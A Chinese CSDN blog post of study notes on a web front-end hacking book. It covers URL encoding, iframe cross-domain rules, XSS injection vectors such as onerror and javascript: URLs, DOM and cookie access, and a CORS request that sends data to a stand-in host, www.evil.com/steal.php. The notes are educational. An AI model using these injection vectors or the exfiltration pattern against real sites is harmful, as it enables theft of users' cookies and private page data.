Web前端黑客技术揭秘 笔记1

最新推荐文章于 2024-04-24 17:04:35 发布
最新推荐文章于 2024-04-24 17:04:35 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 黑客 文章标签: 黑客
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcc526/article/details/13364175
版权

参见余弦的博客http://evilcos.me/

一.URL编码方式

      编码escape 解码 unescape

      编码encodeURI 解码decodeURI

      编码encodeURIComponent 解码decodeURIComponent

二.Iframe

       Web安全中出现率最高的,父页与子页如何跨文档读写数据,如果同域,通过调用contentWindow操作子页的DOM树.

       如果不同域,子页可以对父页的location进行写操作,使其重定向其他网页,有写权限,但是没有读权限

三.HTMl内嵌脚本执行

      JavaScript可以出现在HTML的标签的on事件等地方

     

<script>alert(1)</script>
<img src=# οnerrοr="alert(1)" />
<input type="text" value="x" οnmοuseοver="alert(1)" />
<iframe src="javascript:alert(1)"></iframe>
<a href="javascript:alert(1)">x</a>

四.JavaScript DOM 操作

       4.1 获取 HTML 内容隐私

<html>
    <div id="private">

    </div>
</html>
           可以通过 
document.getElementById('private').innerHTML

     如果没有指定ID,但是如果div 是DOM树从上到下第三个的话,可以通过 

document.getElementsByTagName('div')[2].innerHTML

        4.2 获取Cookies数据

document.cookie

        4.3  获取URL

window.location

        4.4 AJAX 风险

 CORS支持发送数据到另一个域

www.foo.com 的代码如下

function createCORSRequest(method, url) {
    var xhr = new XMLHttpRequest();
    if("withCredentials" in xhr) {
        xhr.open(method, url, true);
    } else if(typeof XDomainRequest != "undefined") {
        xhr = new XDomainRequest();// IE
        xhr.open(method, url);
    } else {
        xhr = null;
    }
    return xhr;
}

var request = createCORSRequest("get", "http://www.evil.com/steal.php?data=456");
if(request) {
    request.onload = function() {
        //对 request.responseText 进行处理
    };
    request.send();
}
steal.php的代码如下 

<?php
header("Access-Control-Allow-Origin:http://www.foo.com");
header("Access-Control-Allow-Credentials:true");//允许跨域证书发送
//...
?>

如果Access-Control-Allow-Credentials的值为true,则Access-Control-Allow-Origin的值不能为*



   


wcc526
关注
专栏目录
Web前端--黑客技术揭秘(菜鸟知识)
ljiechang的专栏
06-03 7196
一,Web安全的关键点 1.同源策略是众多安全策略的一个,是Web层面上的策略,非常重要。 2.同源策略规定:不同域的客户端脚本在没明确授权的情况下,不能读写对方的资源。 3.同域要求两个站点同协议,同域名,同端口。 4.当然,在同一个域内,客户端脚本可以任意读写同源内的资源,前提是这个资源本身是可读可写的。 5.安全类似木桶原理,短的那块板决定了木桶实际能装多少水。一个Web服务器,r
Web前端黑客技术揭秘》学习笔记-XSS
RickGray
03-25 1647
学习和研究Web安全这么久都没有好好地写过心得,SQLi、XSS、CSRF等常见的Web漏洞都看了个遍,回头看来还是什么都不知道(ps:学习和研究的时候做笔记相当重要啊~ ~)。闲暇之余,又拾起余弦大牛的技术精华《Web前端黑客技术揭秘》一书,本人没有做笔记写博客的习惯,但这一次,我要好好地记录一下下,就当练习自己的写作能力了~ 一、XSS介绍:        XSS(Cross Site S
Web前端黑客技术揭秘
csdn1232的博客
02-26 301
Web前端黑客技术揭秘》基本信息作者: 钟晨鸣 徐少培 [作译者介绍]丛书名: 安全技术大系出版社:电子工业出版社ISBN:9787121192036上架时间:2013-1-20出版日期:2013 年1月开本:16开页码:36...
web前端黑客技术揭秘-记录一些自己不懂的知识点
m2a3181的博客
07-24 498
第一章web安全得关键点 简单的xss攻击,原来没见过这种方式,记录一下 跨域访问资源 自己理解的是当www.evil.com的脚本想要访问www.foo.com网站的资源时,这时因为是跨域,所以浏览器先发送一个请求到www.foo.com这个网站,询问这个网站是否同意我的跨域请求访问,在请求的字段里会加上一个origin来表名自己的身份 当www.foo.com收到发来的请求后,会返回一个响应包,里面包含一个字段是Access-Control-Allow-Origin。如果www.evil.com在该字段
Web前端黑客技术揭秘 笔记
zljiaa的博客
09-13 495
第一章 同源策略,很重要,规定:不同域的客户端脚本在没有明确授权的情况下,不能读写对方的资源。 下面对概念中的 不同域、客户端脚本、授权、读写、资源做一些解释 不同域,同域要求两个站点同协议、同域名、同端口 客户端脚本主要是,JavaScript ...
Web前端黑客技术揭秘(1)
m0_73344153的博客
11-30 302
Web安全的关键点
读书笔记:阅读《白帽子讲Web安全》+《Web前端黑客技术揭秘》动手demo.zip
最新发布
07-29
读书笔记:阅读《白帽子讲Web安全》+《Web前端黑客技术揭秘》动手demo
2022年Web前端开发流程和学习路线(详尽版)
weixin_47367099的博客
06-13 9221
前端侧重于人机交互和用户体验,后端侧重于业务逻辑和大规模数据处理。理论上,面向用户的产品里,所有问题(包括产品、设计、后端、甚至看不见的问题)的表现形式,都会暴露在前端,而只有部分问题(数据问题、计算问题、安全问题等)暴露在后端,这就意味着前端起到了至关重要的承载和连接作用。前端技术的更新日新月异;前端框架的技术选型百家争鸣;视觉审美的潮流不断更替;可视化效果酷炫无比;用户的运营体系逐渐精细化;适老化、无障碍化、青少年人群的诉求浮出水面;智能设备的升级和适配无穷无尽。所有的这一切,对前端领域和前端同学就一个
网络安全(黑客技术)—2024自学手册
TDJYGC的博客
04-24 819
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
Web前端黑客技术揭秘笔记
1CHIG0的博客
03-16 1862
    最近在研究《Web安全权威指南》这本书,然而看到了中间部分时感觉有些吃力,找原因还是基本知识不扎实,因为没有系统的学习过python,php,JS等知识。于是很是苦恼,发现了这本书《Web前端黑客技术揭秘》,其中对基础知识的讲解感觉很全面,以下是一些笔记。1、URL格式&lt;scheme&gt;:?//&lt;netloc&gt;/&lt;path&gt;?&lt;query&gt;#&...
Web前端黑客技术揭秘(Web2Hack.org)_(d)致谢1
08-03
Web前端黑客技术揭秘(Web2Hack.org)_(d)致谢1
Web前端黑客技术解密
10-30
Web前端黑客攻防技术是一门非常新颖且有趣的黑客技术,主要包含Web前端安全的跨站脚本(XSS)、跨站请求伪造(CSRF)、界面操作劫持这三大类,涉及的知识点涵盖信任与信任关系、Cookie安全、Flash安全、DOM渲染、字符集、跨域、原生态攻击、高级钓鱼、蠕虫思想等,这些都是研究前端安全的人必备的知识点。本书作者深入剖析了许多经典的攻防技巧,并给出了许多独到的安全见解。 本书适合前端工程师阅读,同时也适合对Web前端各类安全问题或黑客攻防过程充满好奇的读者阅读,书中的内容可以让读者重新认识到Web的危险,并知道该如何去保护自己以免受黑客的攻击。
Web前端黑客技术揭秘{笔记}
weixin_30279315的博客
12-03 925
前些日子看完了白帽子讲Web安全,当时就PHP安全一章做了点小笔记感觉看书还是留下点东西比较好。翻开Web前端黑客技术揭秘一书决定要做笔记,但是这样下来其实进度就比较慢了,敲字做笔记绝对远比看书来的慢。有时候上午看完的内容做笔记时要花一天时间,一方面是要敲字,另一方面是自己只从书上摘录部分内容有时候需要将其串起来,还有就是碰上自己想发两句言也会拖慢进度。总之现在书是看完了,要消化的东西有挺多的,...
web前端黑客技术揭秘 笔记 第一章
王嘟嘟的博客
02-05 320
前言 这里对web前端黑客技术揭秘的知识点做一个笔记,可能更适合个人阅读。这本书里涉及到的东西非常多,全面我不知道,但是需要学习的基础的东西,还有了解的东西很多,遇到不懂的,需要深入挖掘一下的,就继续挖掘。由于本来笔记是写在印象笔记的导致格式可能会有一些问题。 笔记 1.1 数据与指令 1.sql注入 主要就是简单的说了一下sql注入,利用union来进行查询。 一般的情况下,sql发生在服务端,...
web前端黑客技术揭秘——ch01web安全关键点
weixin_42728957的博客
12-19 253
1、数据与指令 数据: 1、服务端存储的:数据库内存、文件系统 2、客户端存储的:本地cookie、Flash cookie等 3、传输中的:json数据、XML数据 4、文本数据:HTML、JavaScript、CSS等 5、多媒体数据:Flash、MP3等 6、图片数据 数据流的每个环节都可能出现安全风险。因为数据流有可能被“污染”,而不像预期的那样存储或传输。 如何存储、传输并呈现出这些数据...
Web前端黑客技术揭秘》学习笔记 第一章
無意穿堂的博客
10-24 464
跨站攻击发生在浏览器客户端,而SQL注入攻击由于针对的对象是数据库,一般情况下发生在服务器端。HTML5提供了新的客户端存储机制:在浏览器端使用SQLite数据库保存客户端数据,该机制允许使用JS脚本操作SQL语句,与本地数据库进行交互。 同源策略:不同域的客户端脚本在没有明确授权的情况下不能读写对方的资源 不同域:协议不同:http/https               域名不同:...
Web爆破攻击实战】Web前端黑客技术解密
Innocence_0的博客
03-07 220
Web爆破攻击实战】Web前端黑客技术解密
WEB前端黑客技术揭秘》基础知识(一)
登天之路
10-25 3456
前言:基础太烂,在这做一下记录,对基础知识进行学习。 URL:统一资源定位符。 超文本传输协议(HTTP)的统一资源定位符将从因特网获取信息的五个基本元素包括在一个简单的地址中: 1、传送协议。 2、服务器。(通常为域名,有时为IP地址) 3、端口号。(以数字方式表示,若为HTTP的预设值“:80”可省略) 4、路径。(以“/”字元区别路径中的每一个目录名称) 5、查询。(GET模式
Java Web前端学习笔记:HTML到AJAX基础
"这篇文档包含了作者在学习Java Web前端时的笔记,主要涵盖了前端开发的基础知识,包括HTML、CSS、JavaScript、DOM编程、jQuery框架以及AJAX基础。" 本文档详细介绍了Java Web前端开发中的核心技术和元素,首先从...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值